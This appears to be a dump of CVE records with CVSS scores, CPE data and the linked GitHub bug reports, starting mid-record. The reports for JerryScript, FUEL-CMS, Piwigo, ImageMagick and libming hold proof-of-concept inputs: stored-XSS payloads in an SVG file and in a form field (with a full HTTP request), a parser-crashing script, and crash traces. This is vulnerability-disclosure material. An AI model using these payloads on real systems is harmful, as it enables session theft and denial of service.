.setHostnameVerifier(HttpsURLConnection.getDefaultHostnameVerifier()) .execute().body(); System.out.println(result1); ``` 也会请求成功。按我理解这样才是合理的,如果服务端证书 server name 与 host 不匹配,应该中断请求才安全。请问我的理解是否正确?是不是其实 javax.net.ssl.HttpsURLConnection 的默认行为会有坑,hutool 才另外指定了 HostnameVerifier 呢? 谢谢。
默认的 HostnameVerifier 为什么选择 TrustAnyHostnameVerifier 呢?
https://api.github.com/repos/dromara/hutool/issues/2042/comments
2
2021-12-26T12:41:33Z
2024-03-12T02:30:59Z
https://github.com/dromara/hutool/issues/2042
1,088,763,905
2,042
CVE-2022-22901
2022-02-17T03:15:06.847
There is an Assertion in 'context_p->next_scanner_info_p->type == SCANNER_TYPE_FUNCTION' failed at parser_parse_function_arguments in /js/js-parser.c of JerryScript commit a6ab5e9.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Not Applicable", "URL Repurposed" ], "url": "http://jerryscript.com" }, { "source": "[email protected]", "tags": [ "Product", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/4916" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:-:*:*:*:*:*:*:*", "matchCriteriaId": "4EB495C8-348F-4B04-B31F-1F4EE471CC22", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jerryscript-project/jerryscript/issues/4916
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
##### JerryScript commit hash `a6ab5e9` ##### Build platform Ubuntu 20.04 LTS ##### Build steps ./tools/build.py --clean --compile-flag=-fsanitize=address --lto=off --error-message=on --profile=es2015-subset --stack-limit=15 --debug --logging=on --line-info=on ##### poc ```js function test(proxyTarget) { var { proxy, revoke } = Proxy.revocable(proxyTarget< new Proxy({}, { get{(target, propertyKey, receiver) { revoke(); } })); return proxy; } Object.getPrototypeOf(test({})); ``` ##### assert log ``` ICE: Assertion 'context_p->next_scanner_info_p->type == SCANNER_TYPE_FUNCTION' failed at /home/ubuntu/fuzz/jerryscript/jerry-core/parser/js/js-parser.c(parser_parse_function_arguments):1618. Error: ERR_FAILED_INTERNAL_ASSERTION Aborted ``` ##### asan log ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==602568==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55cb2935a0c1 bp 0x7ffdb322746c sp 0x7ffdb32250a0 T0) ==602568==The signal is caused by a READ memory access. ==602568==Hint: address points to the zero page. #0 0x55cb2935a0c0 (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x2d40c0) #1 0x55cb2932cbce (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x2a6bce) #2 0x55cb2933ed63 (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x2b8d63) #3 0x55cb2945e610 (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x3d8610) #4 0x55cb294763dc (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x3f03dc) #5 0x55cb2947ea5f (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x3f8a5f) #6 0x55cb2947c741 (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x3f6741) #7 0x55cb2947ea8b (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x3f8a8b) #8 0x55cb2947c741 (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x3f6741) #9 0x55cb2947ea8b (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x3f8a8b) #10 0x55cb2948623b (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x40023b) #11 0x55cb29487623 (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x401623) #12 0x55cb294951f3 (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x40f1f3) #13 0x55cb2949a49b (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x41449b) #14 0x55cb2933ef1a (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x2b8f1a) #15 0x55cb294925c5 (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x40c5c5) #16 0x55cb2949c035 (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x416035) #17 0x55cb2933b318 (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x2b5318) #18 0x55cb29200f3d (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x17af3d) #19 0x55cb290b7290 (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x31290) #20 0x7f2801d550b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #21 0x55cb290c4c0d (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x3ec0d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/home/ubuntu/fuzz/jerryscript/build/bin/jerry+0x2d40c0) ==602568==ABORTING ```
Assertion 'context_p->next_scanner_info_p->type == SCANNER_TYPE_FUNCTION' failed at /home/ubuntu/fuzz/jerryscript/jerry-core/parser/js/js-parser.c(parser_parse_function_arguments):1618
https://api.github.com/repos/jerryscript-project/jerryscript/issues/4916/comments
0
2022-01-02T19:10:38Z
2022-05-21T14:30:43Z
https://github.com/jerryscript-project/jerryscript/issues/4916
1,092,081,853
4,916
CVE-2021-44607
2022-02-24T15:15:24.237
A Cross Site Scripting (XSS) vulnerability exists in FUEL-CMS 1.5.1 in the Assets page via an SVG file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/daylightstudio/FUEL-CMS/issues/589" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:thedaylightstudio:fuel_cms:1.5.1:*:*:*:*:*:*:*", "matchCriteriaId": "F3A806A2-582F-49B6-B9EC-C0FB4B13ED3D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/daylightstudio/FUEL-CMS/issues/589
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "daylightstudio", "FUEL-CMS" ]
A stored cross-site scripting (XSS) vulnerability exists in FUEL-CMS-1.5.1 that allows an authenticated user authorized to upload a malicious .svg file which acts as a stored XSS payload. If this stored XSS payload is triggered by an administrator it will trigger a XSS attack 1. login as admin .in the Assets page ![image](https://user-images.githubusercontent.com/57324002/143893166-5679189f-2e92-43a1-ac13-4f3c5de83534.png) 2. upload the malicious svg. the content of xss-cookie.svg : ``` <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" " http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400 "/> <script type="text/javascript"> alert(document.domain); </script> </svg> ``` ![image](https://user-images.githubusercontent.com/57324002/143893272-ec05eb16-b0a4-4826-9599-e22909b2d194.png) 3. back to Assets then wo can see xss-cookie.svg have been upload: ![image](https://user-images.githubusercontent.com/57324002/143893849-a72a009e-afe8-49b8-80da-2685c88e8c9f.png) 4. when user click the xss-cookie.svg it will trigger a XSS attack ![image](https://user-images.githubusercontent.com/57324002/143893939-e680c062-7dd8-4cd8-9347-3e4355352810.png)
A stored cross-site scripting (XSS) vulnerability exists in FUEL-CMS-1.5.1
https://api.github.com/repos/daylightstudio/FUEL-CMS/issues/589/comments
0
2021-11-29T15:19:12Z
2021-11-29T15:19:12Z
https://github.com/daylightstudio/FUEL-CMS/issues/589
1,066,165,915
589
CVE-2022-24620
2022-02-24T15:15:29.830
Piwigo version 12.2.0 is vulnerable to stored cross-site scripting (XSS), which can lead to privilege escalation. In this way, admin can steal webmaster's cookies to get the webmaster's access.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Piwigo/Piwigo/issues/1605" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:piwigo:piwigo:12.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "81C2A86F-D640-455A-915C-B187ECB741AC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/Piwigo/Piwigo/issues/1605
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Piwigo", "Piwigo" ]
Hi, I found Stored XSS in Piwigo version 12.2.0 (Not tested older versions). **Proof Of Concept**: 1. Add an admin through webmaster's access. 2. Through the admin account open http://localhost/piwigo-12.2.0/piwigo/admin.php?page=cat_list 3. Add < svg onload=alert(1)> (Remove space) in the group name field. Can use any malicious JS code, Now you can see XSS will pop-up. **Impact:** In this way admin can easily takeover webmaster's access using [this technique](https://github.com/R0B1NL1N/WebHacking101/blob/master/xss-reflected-steal-cookie.md). **Burp:** ``` POST http://localhost/piwigo-12.2.0/piwigo/admin.php?page=cat_list Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9,hi;q=0.8 Cache-Control: max-age=0 Connection: keep-alive Content-Length: 98 Content-Type: application/x-www-form-urlencoded Cookie: pwg_id=lq5gpi2eacbfhhp9ckm0i60ee0; pwg_album_manager_view=tile; pwg_user_manager_view=line; PHPSESSID=hjg1fi2funadnubkkvb7381ede Host: localhost Origin: http://localhost Referer: http://localhost/piwigo-12.2.0/piwigo/admin.php?page=cat_list sec-ch-ua: " Not;A Brand";v="99", "Google Chrome";v="97", "Chromium";v="97" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36 pwg_token=4feeb12539296772205ca90e39d382aa&virtual_name=%3Csvg+onload%3Dalert%281%29%3E&submitAdd= ``` ![Screenshot - 2_3_2022 , 12_42_32 AM](https://user-images.githubusercontent.com/18497191/152221531-dc8c660a-e2f6-45ec-bba5-2bfa6c8b1a65.png) Please fix the vulnerability & let me know :). Thank You! - [Chirag Artani](https://3rag.com/chirag-artani)
Piwigo-12.2.0 Vulnerable For Stored XSS Which Is Leading To Privilege Escalation
https://api.github.com/repos/Piwigo/Piwigo/issues/1605/comments
3
2022-02-02T19:14:54Z
2022-07-05T16:00:16Z
https://github.com/Piwigo/Piwigo/issues/1605
1,122,294,432
1,605
CVE-2021-3596
2022-02-24T19:15:09.063
A NULL pointer dereference flaw was found in ImageMagick in versions prior to 7.0.10-31 in ReadSVGImage() in coders/svg.c. This issue is due to not checking the return value from libxml2's xmlCreatePushParserCtxt() and uses the value directly, which leads to a crash and segmentation fault.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1970569" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/2624" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/05/msg00018.html" }, { "source": "[email protected]", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00008.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "5C99ED1A-DE49-4F83-B109-EE35F50E1717", "versionEndExcluding": "7.0.10-31", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:redhat:enterprise_linux:5.0:*:*:*:*:*:*:*", "matchCriteriaId": "1D8B549B-E57B-4DFE-8A13-CAB06B5356B3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "matchCriteriaId": "2F6AB192-9D7D-4A9A-8995-E53A9DE9EAFC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "142AD0DD-4CF3-4D74-9442-459CE3347E3A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/2624
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [Y ] I have written a descriptive issue title - [Y] I have verified that I am using the latest version of ImageMagick - [Y] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported. ### Description <!-- A description of the bug or feature --> There is a segmentation fault caused by the NPD in function ReadSVGImage, svg.c:3621 in ImageMagick 7.0.10. ImageMagick does not check the nullity of the pointer returned from libxml2 and dereference it directly. This directly leads to program crashes and segmentation fault. ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> 1, To ensure reproduce, I use up space in the /tmp folder as a low-level privilege user. For example, to facilitate the reproducation, ~~~~ fallocate -l size_of_the_tmp_folder /tmp/test.img ~~~~ 2, Run: ~~~~ magick convert poc ./test.ps ~~~~ [seg-svg3621.zip](https://github.com/ImageMagick/ImageMagick/files/5280857/seg-svg3621.zip) (unzip first) Here is the trace reported by ASAN: ~~~~ ASAN:SIGSEGV ================================================================= ==112350==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x0000009fec8c bp 0x62700001f900 sp 0x7ffd383e31c0 T0) #0 0x9fec8b in ReadSVGImage ../coders/svg.c:3621 #1 0xc8ba0c in ReadImage ../MagickCore/constitute.c:553 #2 0x8dfbc1 in ReadPESImage ../coders/pes.c:673 #3 0xc8ba0c in ReadImage ../MagickCore/constitute.c:553 #4 0xc8ecbc in ReadImages ../MagickCore/constitute.c:943 #5 0x12bfaef in ConvertImageCommand ../MagickWand/convert.c:607 #6 0x13fd865 in MagickCommandGenesis ../MagickWand/mogrify.c:191 #7 0x43992d in MagickMain ../utilities/magick.c:149 #8 0x7efd17fa982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #9 0x439168 in _start (/mnt/data/playground/ImageMagick/build-asan/utilities/magick+0x439168) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV ../coders/svg.c:3621 ReadSVGImage ==112350==ABORTING ~~~~ ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> ~~~~ CFLAGS='-I/usr/include/libxml2 -I/usr/include/libpng12 -I/usr/include/openjpeg-2.1 -I/usr/include/freetype2 -I/usr/include/freetype2 -fopenmp -Wall -O0 -g -fsanitize=address -mtune=broadwell -fexceptions -pthread -DMAGICKCORE_HDRI_ENABLE=1 -DMAGICKCORE_QUANTUM_DEPTH=16' ~~~~ - ImageMagick version: Version: ImageMagick 7.0.10-31 Q16 x86_64 2020-09-22 https://imagemagick.org Copyright: © 1999-2020 ImageMagick Studio LLC License: https://imagemagick.org/script/license.php Features: Cipher DPC HDRI OpenMP(4.0) Delegates (built-in): bzlib fontconfig freetype jng jp2 jpeg lzma png x xml zlib - Environment (Operating system, version and so on): DISTRIB_ID=Ubuntu DISTRIB_RELEASE=16.04 DISTRIB_CODENAME=xenial DISTRIB_DESCRIPTION="Ubuntu 16.04.6 LTS" - Additional information: <img width="1053" alt="image" src="https://user-images.githubusercontent.com/7632714/94231306-50f87b00-ff36-11ea-8d12-3e4aac41d28c.png"> Here is the link for the function xmlCreatePushParserCtxt in libxml2, which indicates the return value can be NULL if fails. https://gitlab.gnome.org/GNOME/libxml2/-/blob/master/parser.c#L12375 <img width="533" alt="image" src="https://user-images.githubusercontent.com/7632714/94231402-843b0a00-ff36-11ea-9eb0-ed51025e4671.png"> <!-- Thanks for reporting the issue to ImageMagick! -->
Null Pointer dereference caused by incomplete check of the return value from libxml2 in ReadSVGImage svg.c:3621
https://api.github.com/repos/ImageMagick/ImageMagick/issues/2624/comments
1
2020-09-25T05:56:46Z
2020-09-25T18:07:35Z
https://github.com/ImageMagick/ImageMagick/issues/2624
708,663,828
2,624
CVE-2021-34338
2022-03-10T17:42:36.847
Ming 0.4.8 has an out-of-bounds buffer overwrite issue in the function getName() in decompiler.c file that causes a direct segmentation fault and leads to denial of service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1969616" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/201" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:ming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "B2ADA512-48F0-4FC4-8614-0212A9799B56", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/libming/libming/issues/201
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
Hi, there. There is a segmentation fault in the newest master branch 04aee52. Here is the reproducing command: ~~~~ swftophp poc ~~~~ POC: [seg-decompile457.zip](https://github.com/libming/libming/files/5118022/seg-decompile457.zip) Here is the reproduce trace reported by ASAN: ~~~~ ==19422==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000041ef74 bp 0x0c10000017fb sp 0x7ffee6469480 T0) #0 0x41ef73 in getName ../../util/decompile.c:457 #1 0x42b65b in decompileDELETE ../../util/decompile.c:3175 #2 0x42b65b in decompileAction ../../util/decompile.c:3436 #3 0x44e234 in decompileActions ../../util/decompile.c:3535 #4 0x44e234 in decompile5Action ../../util/decompile.c:3558 #5 0x4114d9 in outputSWF_INITACTION ../../util/outputscript.c:1860 #6 0x402836 in readMovie ../../util/main.c:281 #7 0x402836 in main ../../util/main.c:354 #8 0x7f82c681082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #9 0x403b38 in _start (/mnt/data/playground/libming/build/util/swftophp+0x403b38) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV ../../util/decompile.c:457 getName ==19422==ABORTING ~~~~ The cause is due to the incomplete check in line 452 mentioned in the Figure. <img width="1020" alt="image" src="https://user-images.githubusercontent.com/7632714/91049849-671dcd80-e650-11ea-8030-0bb3adeff1ae.png">
Segmentation fault in function getName, decompile.c:457
https://api.github.com/repos/libming/libming/issues/201/comments
0
2020-08-24T13:27:16Z
2020-08-24T13:30:07Z
https://github.com/libming/libming/issues/201
684,668,891
201
CVE-2021-34339
2022-03-10T17:42:37.283
Ming 0.4.8 has an out-of-bounds buffer access issue in the function getString() in decompiler.c file that causes a direct segmentation fault and leads to denial of service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1969607" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/202" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:ming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "B2ADA512-48F0-4FC4-8614-0212A9799B56", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/libming/libming/issues/202
[ "Exploit", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
